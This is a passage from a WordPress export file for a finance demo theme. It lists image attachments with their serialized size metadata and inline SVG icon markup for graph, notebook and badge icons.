36.074219 95.972657 103.523437 91.128907 172.296875-.292969 4.128906 2.820312 7.714844 6.953124 8.007812.179688.011719.355469.015625.535157.015625 3.898437 0 7.195312-3.019531 7.472656-6.972656 5.25-74.5-31.621094-147.375-98.546875-186.3125-8.671875-5.042969-17.773438-9.464844-27.0625-13.144531-3.851562-1.523438-8.210938.363281-9.734375 4.214844-1.523437 3.851562.363281 8.207031 4.214844 9.734374zm0 0"></path><path d="m313.492188 171.933594c2.867187 1.421875 5.640624 2.90625 8.234374 4.417968 40.648438 23.648438 66.148438 65.855469 68.21875 112.902344.175782 4.023438 3.496094 7.167969 7.484376 7.167969.113281 0 .226562 0 .335937-.007813 4.140625-.179687 7.34375-3.683593 7.164063-7.820312-2.296876-52.171875-30.578126-98.976562-75.660157-125.207031-2.882812-1.675781-5.953125-3.324219-9.117187-4.890625-3.710938-1.839844-8.210938-.320313-10.050782 3.386718-1.839843 3.710938-.320312 8.210938 3.390626 10.050782zm0 0"></path><path d="m371.164062 436.148438c-7.078124 5.9375-14.6875 11.398437-22.609374 16.234374-61.472657 37.511719-136.953126 35-194.902344-1.839843-3.492188-2.222657-8.132813-1.191407-10.351563 2.304687-2.222656 3.496094-1.191406 8.128906 2.304688 10.351563 63.878906 40.613281 145.515625 41.800781 210.761719 1.984375 8.5625-5.222656 16.78125-11.125 24.4375-17.542969 3.171874-2.664063 3.585937-7.390625.925781-10.566406-2.660157-3.171875-7.390625-3.589844-10.566407-.925781zm0 0"></path><path d="m332.015625 425.285156c2.855469-1.738281 5.761719-3.65625 8.648437-5.695312 3.382813-2.386719 4.1875-7.066406 1.796876-10.449219-2.390626-3.382813-7.066407-4.1875-10.453126-1.800781-2.609374 1.847656-5.234374 3.574218-7.804687 5.140625-40.136719 24.5-89.390625 26.84375-131.757813 6.273437-3.726562-1.808594-8.214843-.253906-10.023437 3.472656-1.808594 3.722657-.253906 8.210938 3.472656 10.019532 46.933594 22.789062 101.5625 20.230468 146.121094-6.960938zm0 0"></path><path d="m506.246094 418.738281-153.742188-142.207031c-1.605468-1.488281-3.773437-2.199219-5.953125-1.945312l-45.195312 5.210937c-1.582031-5-3.917969-9.667969-6.863281-13.875l-6.4375-176.585937c-.148438-4.136719-3.628907-7.382813-7.765626-7.21875-4.140624.148437-7.371093 3.628906-7.222656 7.765624l5.882813 161.445313c-15.636719-9.433594-35.507813-9.710937-51.355469-.75l-24.09375-32.464844 45.523438-200.886719c.296874-1.3125 1.445312-2.226562 2.789062-2.226562h15.765625c1.546875 0 2.800781 1.210938 2.859375 2.753906l1.707031 46.886719c.152344 4.140625 3.652344 7.359375 7.769531 7.21875 4.136719-.148437 7.371094-3.625 7.222657-7.765625l-1.710938-46.886719c-.351562-9.648437-8.191406-17.207031-17.847656-17.207031h-15.765625c-8.398438 0-15.5625 5.722656-17.414062 13.910156l-46.285157 204.25c-.484375 2.132813-.011719 4.371094 1.289063 6.125l26.355468 35.511719c-7.160156 7.457031-12.089843 17.070313-13.6875 27.757813l-193.675781 121.4375c-8.183593 5.128906-10.808593 15.699218-5.980469 24.058593l7.882813 13.65625c3.273437 5.664063 9.167969 8.941407 15.40625 8.941407 1.773437 0 3.574219-.265626 5.351563-.816407l45.554687-14.128906c3.957031-1.226563 6.171875-5.429687 4.941406-9.382813-1.226562-3.957031-5.425781-6.167968-9.382812-4.941406l-45.558594 14.128906c-1.28125.398438-2.652344-.136718-3.324219-1.300781l-7.882812-13.65625c-.773438-1.335937-.351563-3.027343.957031-3.851562l186.105469-116.6875c3.703125 18.878906 17.835937 34.054687 36.125 39.28125l-15.246094 35.195312-123.925781 38.4375c-3.957031 1.226563-6.167969 5.425781-4.941407 9.382813 1.226563 3.957031 5.429688 6.167968 9.386719 4.941406l127.21875-39.457031c2.085938-.648438 3.789063-2.175781 4.660157-4.183594l18.359374-42.386719c1.921876-.054687 3.816407-.214844 5.679688-.476562l218.09375 115.535156c2.683594 1.421875 5.558594 2.101562 8.390625 2.101562 6.167969 0 12.125-3.21875 15.433594-8.949218l7.886719-13.65625c4.195312-7.273438 2.824218-16.335938-3.339844-22.039063zm-253.636719-87.476562c-20.011719 0-36.109375-16.453125-36.109375-36.109375 0-19.941406 16.238281-36.105469 36.109375-36.105469 19.875 0 36.105469 16.195313 36.105469 36.105469 0 19.675781-15.972656 36.109375-36.105469 36.109375zm243.984375 102.015625-7.882812 13.65625c-.769532 1.335937-2.441407 1.820312-3.8125 1.09375l-205.929688-109.089844c15.308594-9.246094 24.945312-26.113281 24.742188-44.3125l41.136718-4.746094 151.214844 139.871094c.984375.914062 1.207031 2.363281.53125 3.527344zm0 0"></path></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-service-detail3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-services/business-consulting/bg1-service-detail3/</link>
		<pubDate>Thu, 17 Sep 2020 08:48:47 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-service-detail3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>982</wp:post_id>
		<wp:post_date><![CDATA[2020-09-17 08:48:47]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-17 08:48:47]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-service-detail3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>977</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-service-detail3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg1-service-detail3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:420;s:4:"file";s:33:"2020/09/bg1-service-detail3.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:33:"bg1-service-detail3-1-300x145.jpg";s:5:"width";i:300;s:6:"height";i:145;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:33:"bg1-service-detail3-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"bg1-service-detail3-1-768x371.jpg";s:5:"width";i:768;s:6:"height";i:371;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:33:"bg1-service-detail3-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:33:"bg1-service-detail3-1-600x420.jpg";s:5:"width";i:600;s:6:"height";i:420;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image2-home1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-core-values/image2-home1/</link>
		<pubDate>Tue, 22 Sep 2020 04:38:06 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image2-home1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1026</wp:post_id>
		<wp:post_date><![CDATA[2020-09-22 04:38:06]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-22 04:38:06]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image2-home1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image2-home1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/image2-home1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:660;s:4:"file";s:26:"2020/09/image2-home1.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:26:"image2-home1-1-300x264.jpg";s:5:"width";i:300;s:6:"height";i:264;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:26:"image2-home1-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:26:"image2-home1-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:26:"image2-home1-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:26:"image2-home1-1-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>our-vision</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-core-values/our-vision/</link>
		<pubDate>Tue, 22 Sep 2020 04:46:13 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/our-vision.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1029</wp:post_id>
		<wp:post_date><![CDATA[2020-09-22 04:46:13]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-22 04:46:13]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[our-vision]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/our-vision.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/our-vision.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:656;s:4:"file";s:24:"2020/09/our-vision.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:24:"our-vision-1-300x262.jpg";s:5:"width";i:300;s:6:"height";i:262;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"our-vision-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"our-vision-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"our-vision-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:24:"our-vision-1-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>graph</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/home/graph/</link>
		<pubDate>Wed, 30 Sep 2020 08:03:12 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/graph.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1081</wp:post_id>
		<wp:post_date><![CDATA[2020-09-30 08:03:12]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-30 08:03:12]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[graph]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/graph.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/graph.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<path d="M326.623,133.062c13.785,0,25-11.215,25-25s-11.215-25.001-25-25.001s-25,11.216-25,25.001   c0,5.63,1.872,10.83,5.025,15.014l-41.076,57.401c-2.451-0.805-5.066-1.247-7.784-1.247c-6.569,0-12.551,2.551-17.017,6.709   l-27.379-15.536c0.365-1.696,0.561-3.454,0.561-5.257c0-13.785-11.215-25-25-25s-25,11.215-25,25c0,1.803,0.196,3.561,0.561,5.257   l-27.379,15.536c-4.466-4.158-10.448-6.708-17.017-6.708c-13.785,0-25,11.216-25,25.001s11.215,25.001,25,25.001   s25-11.216,25-25.001c0-1.803-0.196-3.561-0.561-5.257l27.379-15.536c4.466,4.158,10.448,6.709,17.017,6.709   c6.569,0,12.55-2.551,17.017-6.708l27.379,15.536c-0.365,1.696-0.561,3.454-0.561,5.257c0,13.785,11.215,25.001,25,25.001   c13.786,0,25.001-11.216,25.001-25.001c0-5.631-1.873-10.832-5.026-15.016l41.076-57.401   C321.289,132.62,323.905,133.062,326.623,133.062z M326.623,98.061c5.514,0,10,4.486,10,10.001c0,5.514-4.486,10-10,10   s-10-4.486-10-10C316.622,102.547,321.108,98.061,326.623,98.061z M120.115,214.231c-5.514,0-10-4.486-10-10.001   s4.486-10.001,10-10.001s10,4.486,10,10.001S125.629,214.231,120.115,214.231z M188.951,175.146c-5.514,0-10-4.486-10-10.001   c0-5.514,4.486-10,10-10s10,4.486,10,10C198.952,170.66,194.465,175.146,188.951,175.146z M257.787,214.231   c-5.514,0-10-4.486-10-10.001s4.486-10.001,10-10.001c5.515,0,10.001,4.486,10.001,10.001S263.301,214.231,257.787,214.231z"></path>
	<path d="M418.796,376.965H366.31H80.428H21.215c-3.427,0-6.215-2.788-6.215-6.215V61.331c0-3.427,2.788-6.215,6.215-6.215h35.356   c4.142,0,7.5-3.357,7.5-7.5s-3.358-7.5-7.5-7.5H21.215C9.517,40.116,0,49.633,0,61.331V370.75c0,11.698,9.517,21.215,21.215,21.215   h51.713v16.506c0,9.403,7.65,17.053,17.053,17.053h75.074l-35.34,68.998c-1.888,3.687-0.431,8.206,3.256,10.095   c1.094,0.561,2.262,0.826,3.413,0.826c2.725,0,5.354-1.49,6.681-4.083l38.843-75.836h82.922l38.843,75.836   c1.328,2.593,3.956,4.083,6.681,4.083c1.151,0,2.319-0.267,3.413-0.826c3.687-1.889,5.145-6.408,3.256-10.095l-35.34-68.998h75.074   c9.403,0,17.053-7.649,17.053-17.053v-16.506h44.986c4.142,0,7.5-3.357,7.5-7.5S422.938,376.965,418.796,376.965z M358.81,408.471   c0,1.132-0.921,2.053-2.053,2.053H89.981c-1.132,0-2.053-0.921-2.053-2.053v-16.506H358.81V408.471z"></path>
	<path d="M86.571,55.116h102.672h68.251h168.028c3.427,0,6.215,2.788,6.215,6.215v71.311c0,4.143,3.358,7.5,7.5,7.5   s7.5-3.357,7.5-7.5V61.331c0-11.698-9.517-21.215-21.215-21.215H264.995V25.374c0-10.375-8.441-18.816-18.817-18.816H200.56   c-10.375,0-18.817,8.441-18.817,18.816v14.742H86.571c-4.142,0-7.5,3.357-7.5,7.5S82.429,55.116,86.571,55.116z M196.743,25.374   c0-2.104,1.712-3.816,3.817-3.816h45.618c2.104,0,3.817,1.712,3.817,3.816v14.742h-53.251V25.374z"></path>
	<path d="M104.902,267.576c-4.142,0-7.5,3.357-7.5,7.5v66.272c0,4.143,3.358,7.5,7.5,7.5h30.427c4.142,0,7.5-3.357,7.5-7.5v-66.272   c0-4.143-3.358-7.5-7.5-7.5H104.902z M127.829,333.849h-15.427v-51.272h15.427V333.849z"></path>
	<path d="M173.737,229.248c-4.142,0-7.5,3.357-7.5,7.5v104.601c0,4.143,3.358,7.5,7.5,7.5h30.427c4.142,0,7.5-3.357,7.5-7.5V236.748   c0-4.143-3.358-7.5-7.5-7.5H173.737z M196.665,333.849h-15.427v-89.601h15.427V333.849z"></path>
	<path d="M242.573,267.576c-4.142,0-7.5,3.357-7.5,7.5v66.272c0,4.143,3.358,7.5,7.5,7.5H273c4.142,0,7.5-3.357,7.5-7.5v-66.272   c0-4.143-3.358-7.5-7.5-7.5H242.573z M265.5,333.849h-15.427v-51.272H265.5V333.849z"></path>
	<path d="M311.409,311.832c-4.142,0-7.5,3.357-7.5,7.5v22.017c0,4.143,3.358,7.5,7.5,7.5h30.427c4.142,0,7.5-3.357,7.5-7.5   s-3.358-7.5-7.5-7.5h-22.927v-14.517C318.909,315.189,315.551,311.832,311.409,311.832z"></path>
	<path d="M508.175,384.019l-43.027-74.526c10.901-11.619,18.839-25.816,23.079-41.64c6.777-25.291,3.299-51.708-9.793-74.384   c-27.026-46.813-87.097-62.906-133.907-35.881c-46.811,27.025-62.906,87.096-35.88,133.907   c13.092,22.676,34.231,38.896,59.522,45.674c8.446,2.263,17.015,3.382,25.53,3.382c7.442,0,14.841-0.856,22.077-2.55l43.018,74.528   c5.273,9.137,14.875,14.25,24.737,14.249c4.833,0,9.729-1.229,14.208-3.813c8.796-5.077,14.261-14.544,14.261-24.706   C512,393.28,510.678,388.357,508.175,384.019z M372.051,322.68c-21.421-5.74-39.326-19.479-50.415-38.685   c-22.89-39.648-9.257-90.526,30.39-113.417c13.043-7.53,27.296-11.106,41.374-11.106c28.715,0,56.683,14.893,72.043,41.497   c11.088,19.206,14.034,41.58,8.294,63.002c-5.74,21.422-19.479,39.325-38.685,50.414   C415.847,325.474,393.473,328.418,372.051,322.68z M490.242,409.973c-6.453,3.726-14.733,1.508-18.456-4.942l-41.388-71.704   c4.148-1.693,8.21-3.673,12.156-5.951c3.949-2.28,7.689-4.818,11.23-7.566l41.4,71.707c1.188,2.061,1.816,4.393,1.816,6.743   C497,403.078,494.41,407.567,490.242,409.973z"></path>
	<path d="M461.542,263.611c5.295-17.056,4.034-35.316-3.551-51.416c-1.766-3.748-6.234-5.354-9.981-3.589   c-3.748,1.766-5.354,6.234-3.588,9.981c5.983,12.7,6.976,27.109,2.795,40.575c-4.204,13.54-13.286,24.903-25.573,31.997   c-13.002,7.508-28.151,9.5-42.652,5.615c-14.502-3.886-26.624-13.187-34.13-26.189c-15.497-26.841-6.267-61.285,20.574-76.782   c19.625-11.329,43.98-9.815,62.051,3.857c3.304,2.5,8.007,1.849,10.506-1.455c2.499-3.303,1.848-8.007-1.456-10.506   c-22.891-17.321-53.745-19.238-78.602-4.887c-16.472,9.51-28.255,24.866-33.178,43.238s-2.396,37.562,7.114,54.034   c9.51,16.473,24.866,28.255,43.238,33.179c6.135,1.644,12.361,2.457,18.546,2.457c12.338,0,24.517-3.236,35.488-9.571   C444.71,295.163,456.216,280.767,461.542,263.611z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>notebook</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/home/notebook/</link>
		<pubDate>Wed, 30 Sep 2020 10:00:59 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/notebook.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1108</wp:post_id>
		<wp:post_date><![CDATA[2020-09-30 10:00:59]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-30 10:00:59]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[notebook]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/notebook.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/notebook.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 511.989 511.989" style="enable-background:new 0 0 511.989 511.989;" xml:space="preserve">
<g>
	<path d="M504.89,145.383L320.201,38.759c-3.291-1.906-7.127-2.413-10.798-1.43c-3.673,0.985-6.74,3.344-8.627,6.628l-12.728,22.041   c-1.799-0.322-3.647-0.5-5.537-0.5H156.94c-4.142,0-7.5,3.357-7.5,7.5s3.358,7.5,7.5,7.5h125.57c9.021,0,16.36,7.334,16.36,16.35   v346.95c0,9.016-7.339,16.351-16.36,16.351H61.05c-9.021,0-16.36-7.335-16.36-16.351v-45.304h18.954   c5.921,0,10.739-4.817,10.739-10.739v-19.435c0-5.921-4.817-10.738-10.739-10.738H10.739C4.817,357.583,0,362.4,0,368.321v19.435   c0,5.922,4.817,10.739,10.739,10.739H29.69v45.304c0,17.287,14.068,31.351,31.36,31.351h221.46c17.292,0,31.36-14.063,31.36-31.351   V307.929l47.71,27.545c1.181,0.682,2.471,1.006,3.743,1.006c2.592,0,5.113-1.345,6.502-3.751c2.071-3.587,0.842-8.174-2.745-10.245   l-55.21-31.875v-23.21l65.26,37.675c1.182,0.682,2.471,1.006,3.743,1.006c2.592,0,5.113-1.345,6.502-3.751   c2.071-3.588,0.842-8.175-2.745-10.245l-72.76-42.005V226.87l82.81,47.814c1.182,0.682,2.471,1.006,3.744,1.006   c2.591,0,5.113-1.345,6.502-3.751c2.071-3.587,0.842-8.174-2.745-10.245l-90.311-52.146v-23.209l100.36,57.945   c1.181,0.682,2.471,1.006,3.743,1.006c2.592,0,5.113-1.345,6.502-3.751c2.071-3.587,0.842-8.174-2.745-10.245l-107.86-62.275   v-72.17c0-10.015-4.727-18.94-12.062-24.684l11.565-20.026l183.342,105.846L337.944,432.978c-3.462-1.548-7.608-0.26-9.548,3.099   c-2.072,3.586-0.845,8.174,2.742,10.246c2.23,1.289,4.669,1.901,7.08,1.901c4.915-0.001,9.707-2.549,12.347-7.105l159.538-276.324   C513.999,158.015,511.665,149.31,504.89,145.383z M15,372.583h44.383v10.912H15V372.583z"></path>
	<path d="M430.955,155.172l-82.268-47.497c-3.588-2.071-8.174-0.843-10.245,2.745c-2.071,3.587-0.842,8.174,2.745,10.245   l82.268,47.497c1.181,0.682,2.471,1.006,3.743,1.006c2.592,0,5.113-1.345,6.502-3.751   C435.771,161.83,434.542,157.243,430.955,155.172z"></path>
	<path d="M10.739,153.406H29.69v55.593c0,4.143,3.358,7.5,7.5,7.5s7.5-3.357,7.5-7.5v-55.593h18.954   c5.921,0,10.739-4.817,10.739-10.739v-19.435c0-5.922-4.817-10.739-10.739-10.739H44.69V96.848c0-9.016,7.339-16.35,16.36-16.35   h65.9c4.142,0,7.5-3.357,7.5-7.5s-3.358-7.5-7.5-7.5h-65.9c-17.292,0-31.36,14.063-31.36,31.35v15.645H10.739   C4.817,112.493,0,117.31,0,123.232v19.435C0,148.589,4.817,153.406,10.739,153.406z M15,127.493h44.383v10.913H15V127.493z"></path>
	<path d="M10.739,275.95h18.952v59.254c0,4.143,3.358,7.5,7.5,7.5s7.5-3.357,7.5-7.5V275.95h18.953   c5.921,0,10.739-4.817,10.739-10.738v-19.435c0-5.922-4.817-10.739-10.739-10.739H10.739C4.817,235.038,0,239.855,0,245.777v19.435   C0,271.133,4.817,275.95,10.739,275.95z M15,250.038h44.383v10.912H15V250.038z"></path>
	<path d="M103.629,147.61v38.978c0,7.112,5.786,12.898,12.898,12.898h110.504c7.112,0,12.898-5.786,12.898-12.898V147.61   c0-7.112-5.786-12.898-12.898-12.898H116.527C109.415,134.712,103.629,140.498,103.629,147.61z M118.629,149.712H224.93v34.774   H118.629V149.712z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>badge</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/home/badge/</link>
		<pubDate>Thu, 01 Oct 2020 07:46:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/badge.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1150</wp:post_id>
		<wp:post_date><![CDATA[2020-10-01 07:46:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-01 07:46:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[badge]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/badge.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/badge.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
